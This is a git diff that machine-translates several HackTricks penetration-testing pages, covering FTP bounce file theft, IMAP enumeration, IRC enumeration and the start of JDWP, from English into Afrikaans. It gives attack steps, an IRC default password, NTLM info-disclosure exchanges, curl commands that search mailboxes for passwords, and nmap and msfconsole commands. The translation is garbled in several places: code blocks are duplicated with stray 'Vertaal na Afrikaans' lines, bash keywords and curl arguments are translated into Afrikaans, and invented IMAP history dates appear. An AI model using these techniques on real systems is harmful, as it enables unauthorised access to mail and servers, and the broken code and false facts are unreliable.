-# Resume +# Hervat -If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server. +As jy toegang het tot 'n stuiterende FTP-bediener, kan jy dit laat versoek om lêers van 'n ander FTP-bediener (waarvan jy sekere geloofsbriewe ken) te vra en daardie lêer na jou eie bediener te laai. -## Requirements +## Vereistes -- FTP valid credentials in the FTP Middle server -- FTP valid credentials in Victim FTP server -- Both server accepts the PORT command \(bounce FTP attack\) -- You can write inside some directory of the FRP Middle server -- The middle server will have more access inside the Victim FTP Server than you for some reason \(this is what you are going to exploit\) +- Geldige FTP-geloofsbriewe in die FTP Middelbediener +- Geldige FTP-geloofsbriewe in die slagoffer FTP-bediener +- Beide bedieners aanvaar die PORT-opdrag (stuiterende FTP-aanval) +- Jy kan binne 'n gids van die FRP Middelbediener skryf +- Die middelbediener sal meer toegang tot die slagoffer FTP-bediener hê as jy om een of ander rede (dit is wat jy gaan uitbuit) -## Steps +## Stappe -1. Connect to your own FTP server and make the connection passive \(pasv command\) to make it listen in a directory where the victim service will send the file -2. Make the file that is going to send the FTP Middle server t the Victim server \(the exploit\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server. -3. Connect to the FTP Middle Server and upload de previous file -4. Make the FTP Middle server establish a connection with the victim server and send the exploit file -5. Capture the file in your own FTP server -6. Delete the exploit file from the FTP Middle server +1. Maak verbinding met jou eie FTP-bediener en maak die verbinding passief (pasv-opdrag) sodat dit in 'n gids luister waar die slagofferdiens die lêer sal stuur +2. Maak die lêer wat die FTP Middelbediener na die Slagofferbediener gaan stuur (die uitbuiting). Hierdie lêer sal 'n eenvoudige teks wees van die nodige opdragte om teen die Slagofferbediener te verifieer, die gids te verander en 'n lêer na jou eie bediener te laai. +3. Maak verbinding met die FTP Middelbediener en laai die vorige lêer op +4. Laat die FTP Middelbediener 'n verbinding met die slagofferbediener tot stand bring en stuur die uitbuitingslêer +5. Vang die lêer op jou eie FTP-bediener +6. Verwyder die uitbuitingslêer van die FTP Middelbediener -For a more detailed information check the post: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html) +Vir meer gedetailleerde inligting, kyk na die pos: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md index 9f0ac5983..a6f0d106c 100644 --- a/network-services-pentesting/pentesting-imap.md +++ b/network-services-pentesting/pentesting-imap.md @@ -2,21 +2,21 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} @@ -24,114 +24,133 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track ## Internet Message Access Protocol -The **Internet Message Access Protocol (IMAP)** is designed for the purpose of enabling users to **access their email messages from any location**, primarily through an Internet connection. In essence, emails are **retained on a server** rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done **directly from the server**. This capability allows for the convenience of checking emails from **multiple devices**, ensuring that no messages are missed regardless of the device used. +Die **Internet Message Access Protocol (IMAP)** is ontwerp om gebruikers in staat te stel om hul e-posse van enige plek af te **toegang**, hoofsaaklik deur middel van 'n internetverbinding. In essensie word e-posse **op 'n bediener behou** in plaas daarvan om afgelaai en gestoor te word op 'n individu se persoonlike toestel. Dit beteken dat wanneer 'n e-pos geopen of gelees word, dit **direk vanaf die bediener** gedoen word. Hierdie vermoë maak dit gerieflik om e-posse vanaf **verskeie toestelle** te kontroleer, om te verseker dat geen boodskappe gemis word nie, ongeag die gebruikte toestel. -By default, the IMAP protocol works on two ports: - -* **Port 143** - this is the default IMAP non-encrypted port -* **Port 993** - this is the port you need to use if you want to connect using IMAP securely +Standaard werk die IMAP-protokol op twee poorte: +* **Poort 143** - dit is die verstek IMAP nie-gekripteerde poort +* **Poort 993** - dit is die poort wat jy moet gebruik as jy veilig wil koppel met IMAP ``` PORT STATE SERVICE REASON 143/tcp open imap syn-ack ``` +## Banner gryp -## Banner grabbing +Banner gryp is 'n tegniek wat gebruik word om inligting oor 'n IMAP-diens te verkry deur die banner te ondersoek wat deur die diens tydens die verbinding verskaf word. Die banner is 'n stuk teks wat deur die diens teruggestuur word as deel van die verwelkomingsboodskap wanneer 'n kliënt suksesvol met die diens verbind. +Hier is 'n voorbeeld van 'n IMAP-banner: + +``` +* OK [CAPABILITY IMAP4rev1 STARTTLS AUTH=PLAIN] IMAP4rev1 Service Ready +``` + +Die banner kan waardevolle inligting verskaf, soos die diens se naam, weergawe, ondersteunde funksies en selfs sekuriteitskwessies. Dit kan 'n nuttige beginpunt wees vir 'n aanvaller om die diens te ondersoek en potensiële aanvalsveilighede te identifiseer. + +Om 'n banner gryp uit te voer, kan jy 'n netwerk-skanderingstool soos Nmap gebruik. Hier is 'n voorbeeld van die gebruik van Nmap om 'n IMAP-diens se banner te gryp: + +``` +nmap -p 143 --script imap-capabilities +``` + +Dit sal die banner van die IMAP-diens op die gespesifiseerde teiken skandeer en die ondersteunde funksies en protokolversie toon. + +Dit is belangrik om banner gryp met omsigtigheid uit te voer, aangesien dit 'n potensiële aanvaller kan blootstel aan die diens en die risiko van opsporing kan verhoog. Dit moet slegs in 'n geoorloofde omgewing en met toestemming van die eienaar van die stelsel uitgevoer word. ```bash nc -nv 143 openssl s_client -connect :993 -quiet ``` +### NTLM-verifikasie - Inligtingsoffergawe -### NTLM Auth - Information disclosure - -If the server supports NTLM auth (Windows) you can obtain sensitive info (versions): - +As die bediener NTLM-verifikasie ondersteun (Windows), kan jy sensitiewe inligting (weergawes) bekom: ``` -root@kali: telnet example.com 143 -* OK The Microsoft Exchange IMAP4 service is ready. ->> a1 AUTHENTICATE NTLM -+ ->> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= +root@kali: telnet example.com 143 +* OK The Microsoft Exchange IMAP4 service is ready. +>> a1 AUTHENTICATE NTLM ++ +>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA ``` - -Or **automate** this with **nmap** plugin `imap-ntlm-info.nse` +Of **outomatiseer** dit met die **nmap** invoegtoepassing `imap-ntlm-info.nse` ### [IMAP Bruteforce](../generic-methodologies-and-resources/brute-force.md#imap) -## Syntax +## Sintaksis -IAMP Commands examples from [here](https://donsutherland.org/crib/imap): - +IAMP-opdragvoorbeelde van [hier](https://donsutherland.org/crib/imap): ``` Login - A1 LOGIN username password +A1 LOGIN username password Values can be quoted to enclose spaces and special characters. A " must then be escape with a \ - A1 LOGIN "username" "password" +A1 LOGIN "username" "password" List Folders/Mailboxes - A1 LIST "" * - A1 LIST INBOX * - A1 LIST "Archive" * +A1 LIST "" * +A1 LIST INBOX * +A1 LIST "Archive" * Create new Folder/Mailbox - A1 CREATE INBOX.Archive.2012 - A1 CREATE "To Read" +A1 CREATE INBOX.Archive.2012 +A1 CREATE "To Read" Delete Folder/Mailbox - A1 DELETE INBOX.Archive.2012 - A1 DELETE "To Read" +A1 DELETE INBOX.Archive.2012 +A1 DELETE "To Read" Rename Folder/Mailbox - A1 RENAME "INBOX.One" "INBOX.Two" +A1 RENAME "INBOX.One" "INBOX.Two" List Subscribed Mailboxes - A1 LSUB "" * +A1 LSUB "" * Status of Mailbox (There are more flags than the ones listed) - A1 STATUS INBOX (MESSAGES UNSEEN RECENT) +A1 STATUS INBOX (MESSAGES UNSEEN RECENT) Select a mailbox - A1 SELECT INBOX +A1 SELECT INBOX List messages - A1 FETCH 1:* (FLAGS) - A1 UID FETCH 1:* (FLAGS) +A1 FETCH 1:* (FLAGS) +A1 UID FETCH 1:* (FLAGS) Retrieve Message Content - A1 FETCH 2 body[text] - A1 FETCH 2 all - A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) +A1 FETCH 2 body[text] +A1 FETCH 2 all +A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) Close Mailbox - A1 CLOSE +A1 CLOSE Logout - A1 LOGOUT +A1 LOGOUT ``` +### Evolusie -### Evolution +IMAP (Internet Message Access Protocol) is 'n protokol wat gebruik word om e-pos te ontvang en te stuur. Dit is 'n belangrike diens wat deur baie e-posbedieners en -kliënte gebruik word. Die protokol het deur die jare geëvolueer om te voldoen aan die veranderende behoeftes van gebruikers en om sekuriteitskwessies aan te spreek. +Die oorspronklike IMAP-protokol, bekend as IMAP4, is in 1986 ontwikkel. Dit het die funksionaliteit gebied om e-posboodskappe op 'n bediener te stoor en te bestuur. Dit het ook toegelaat dat gebruikers e-posboodskappe op die bediener laat staan terwyl hulle slegs 'n gedeelte van die boodskappe op hul toestelle aflaai. + +In 1993 is IMAP4 gereviseer en opgegradeer na IMAP4rev1. Hierdie opgradering het nuwe funksies en verbeterings gebring, soos die vermoë om e-posboodskappe in mappen te organiseer en om te gaan met gedeelde mappen. Dit het ook die gebruik van MIME (Multipurpose Internet Mail Extensions) ondersteun, wat die oordrag van nie-tekstuele inhoud soos bylae moontlik maak. + +Die mees onlangse weergawe van IMAP is IMAP4rev2, wat in 2003 vrygestel is. Hierdie weergawe het verdere verbeterings gebring, insluitend die vermoë om e-posboodskappe te soek en te filter, en die ondersteuning van SSL/TLS vir veilige kommunikasie. + +Die evolusie van IMAP het dit 'n kragtige en veelsydige protokol gemaak wat gebruikers in staat stel om e-posboodskappe effektief te bestuur en te organiseer. Dit is egter belangrik om bewus te wees van die sekuriteitskwessies wat met IMAP gepaard gaan en om toepaslike maatreëls te tref om die integriteit en vertroulikheid van e-pos te beskerm. ``` apt install evolution ``` - ![](<../.gitbook/assets/image (528).png>) ### CURL -Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details. - -1. Listing mailboxes (imap command `LIST "" "*"`) +Basiese navigasie is moontlik met [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), maar die dokumentasie is lig op besonderhede, so dit is aanbeveel om die [bron](https://github.com/curl/curl/blob/master/lib/imap.c) te raadpleeg vir presiese besonderhede. +1. Lys van posbusse (imap-opdrag `LIST "" "*"`) ```bash curl -k 'imaps://1.2.3.4/' --user user:pass ``` -2. Listing messages in a mailbox (imap command `SELECT INBOX` and then `SEARCH ALL`) +2. Lys van boodskappe in 'n posbus (imap-opdrag `SELECT INBOX` en dan `SEARCH ALL`) - ```bash +```bash curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass ``` @@ -140,7 +159,7 @@ The result of this search is a list of message indicies. Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body: ```bash -curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass +curl -k 'imaps://1.2.3.4/Drafts?TEKS wagwoord' --user gebruiker:wagwoord ``` A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/). @@ -148,6 +167,10 @@ A nice overview of the search terms possible is located [here](https://www.atmai 3. Downloading a message (imap command `SELECT Drafts` and then `FETCH 1 BODY[]`) ```bash +curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass + +Vertaal na Afrikaans: + curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass ``` @@ -156,23 +179,33 @@ The mail index will be the same index returned from the search operation. It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g. ```bash +```afrikaans curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass ``` +```afrikaans +curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SOEK ALLES' --user gebruiker:wagwoord +curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user gebruiker:wagwoord +``` +``` Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the `-v` is required to see the subject and sender): ```bash +$ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<' + +Vertaal na Afrikaans: + $ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<' ``` Although, its probably cleaner to just write a little for loop: ```bash -for m in {1..5}; do - echo $m - curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass -done +Vir m in {1..5}; doen +echo $m +curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass +gedaan ``` ## Shodan @@ -183,33 +216,33 @@ done ## HackTricks Automatic Commands ``` -Protocol_Name: IMAP #Protocol Abbreviation if there is one. -Port_Number: 143,993 #Comma separated if there is more than one. -Protocol_Description: Internet Message Access Protocol #Protocol Abbreviation Spelled out +Protokol_Naam: IMAP #Protokol Afkorting indien daar een is. +Poort_Nommer: 143,993 #Komma geskei indien daar meer as een is. +Protokol_Beskrywing: Internet Message Access Protocol #Protokol Afkorting voluit geskryf -Entry_1: - Name: Notes - Description: Notes for WHOIS - Note: | - The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used. +Inskrywing_1: +Naam: Notas +Beskrywing: Notas vir WHOIS +Nota: | +Die Internet Message Access Protocol (IMAP) is ontwerp om gebruikers in staat te stel om hul e-pos boodskappe van enige plek te benader, hoofsaaklik deur middel van 'n internetverbinding. In wese word e-posse op 'n bediener behou in plaas daarvan om afgelaai en gestoor te word op 'n individu se persoonlike toestel. Dit beteken dat wanneer 'n e-pos geopen of gelees word, dit direk vanaf die bediener gedoen word. Hierdie vermoë maak dit gerieflik om e-posse vanaf verskeie toestelle te kontroleer, om te verseker dat geen boodskappe gemis word nie, ongeag die gebruikte toestel. - https://book.hacktricks.xyz/pentesting/pentesting-imap +https://book.hacktricks.xyz/pentesting/pentesting-imap -Entry_2: - Name: Banner Grab - Description: Banner Grab 143 - Command: nc -nv {IP} 143 +Inskrywing_2: +Naam: Banner Grys +Beskrywing: Banner Grys 143 +Opdrag: nc -nv {IP} 143 -Entry_3: - Name: Secure Banner Grab - Description: Banner Grab 993 - Command: openssl s_client -connect {IP}:993 -quiet - -Entry_4: - Name: consolesless mfs enumeration - Description: IMAP enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' +Inskrywing_3: +Naam: Veilige Banner Grys +Beskrywing: Banner Grys 993 +Opdrag: openssl s_client -connect {IP}:993 -quiet + +Inskrywing_4: +Naam: mfs opsporing sonder die nodigheid om msfconsole te hardloop +Beskrywing: IMAP opsporing sonder die nodigheid om msfconsole te hardloop +Nota: afkomstig van https://github.com/carlospolop/legion +Opdrag: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' ```
diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index 908b46b4b..23f028413 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -2,48 +2,43 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation. +IRC, aanvanklik 'n **plain text-protokol**, is toegewys aan **194/TCP** deur IANA, maar word gewoonlik uitgevoer op **6667/TCP** en soortgelyke poorte om te voorkom dat **root-voorregte** nodig is vir bedryf. -A **nickname** is all that's needed to connect to a server. Following connection, the server performs a reverse-DNS lookup on the user's IP. +'n **Bynaam** is alles wat nodig is om met 'n bediener te verbind. Na die verbinding voer die bediener 'n omgekeerde DNS-opsoek uit op die IP-adres van die gebruiker. -Users are divided into **operators**, who need a **username** and **password** for more access, and regular **users**. Operators have varying levels of privileges, with administrators at the top. - -**Default ports:** 194, 6667, 6660-7000 +Gebruikers word verdeel in **operateurs**, wat 'n **gebruikersnaam** en **wagwoord** nodig het vir meer toegang, en gewone **gebruikers**. Operateurs het verskillende vlakke van voorregte, met administrateurs bo-aan. +**Verstekpoorte:** 194, 6667, 6660-7000 ``` PORT STATE SERVICE 6667/tcp open irc ``` +## Opname -## Enumeration - -### Banner - -IRC can support **TLS**. +### Banier +IRC kan **TLS** ondersteun. ```bash nc -vn openssl s_client -connect : -quiet ``` +### Handleiding -### Manual - -Here you can see how to connect and access the IRC using some **random nickname** and then enumerate some interesting info. You can learn more commands of IRC [here](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). - +Hier kan jy sien hoe om te verbind en toegang te verkry tot die IRC deur gebruik te maak van 'n **willekeurige bynaam** en dan sekere interessante inligting op te som. Jy kan meer bevele van IRC leer [hier](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). ```bash #Connection with random nickname USER ran213eqdw123 0 * ran213eqdw123 @@ -72,37 +67,51 @@ JOIN #Connect to a channel #Operator creds Brute-Force OPER ``` - -You can, also, atttempt to login to the server with a password. The default password for ngIRCd is `wealllikedebian`. - +Jy kan ook probeer om in te teken op die bediener met 'n wagwoord. Die verstek wagwoord vir ngIRCd is `wealllikedebian`. ```bash PASS wealllikedebian NICK patrick USER test1 test2 :test3 ``` +### **Vind en skandeer IRC-dienste** -### **Find and scan IRC services** +IRC (Internet Relay Chat) is 'n kommunikasieprotokol wat gebruik word vir real-time gesprekke oor die internet. Dit is 'n gewilde platform vir gemeenskapsgebaseerde gesprekke en groepskommunikasie. As 'n pentester is dit belangrik om IRC-dienste te vind en te skandeer vir moontlike kwesbaarhede. +#### **1. Identifiseer IRC-dienste** + +Om IRC-dienste te vind, kan jy die volgende metodes gebruik: + +- **Portskandering**: Skandeer die doelwit se IP-adres vir oop poorte wat verband hou met IRC-dienste. Die standaardpoort vir IRC is 6667, maar dit kan ook op ander poorte bedryf word. +- **Banner Grabbing**: Maak gebruik van 'n gereedskap soos `telnet` om na die baniere van die doelwit se IP-adres te soek. IRC-dienste kan dikwels spesifieke baniere hê wat dit maklik maak om hulle te identifiseer. + +#### **2. Skandeer IRC-dienste** + +Nadat jy IRC-dienste geïdentifiseer het, kan jy dit skandeer vir moontlike kwesbaarhede. Hier is 'n paar tegnieke wat jy kan gebruik: + +- **Niksheid**: Probeer om toegang te verkry tot die IRC-diens sonder om opgemerk te word. Dit kan gedoen word deur die standaardgebruikersnaam en wagwoord te gebruik of deur te soek na bekende swak wagwoorde. +- **Bruteforcing**: Voer 'n bruteforce-aanval uit om die wagwoorde van gebruikers te agterhaal. Maak gebruik van gereedskap soos Hydra of Medusa om verskillende kombinasies van gebruikersname en wagwoorde te probeer. +- **Kwesbaarheidsskandeerders**: Gebruik 'n kwesbaarheidsskandeerder soos Nessus of OpenVAS om te soek na bekende kwesbaarhede in die IRC-diens. + +Deur die identifisering en skandering van IRC-dienste kan jy moontlike kwesbaarhede opspoor en uitbuit om toegang tot die stelsel te verkry. Dit is belangrik om hierdie stappe te volg as deel van jou pentesting-proses. ```bash nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#irc) ### Shodan -* `looking up your hostname` +* `opsoek na jou gasheernaam`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index 0e78c9238..a578ef21e 100644 --- a/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -2,63 +2,61 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks 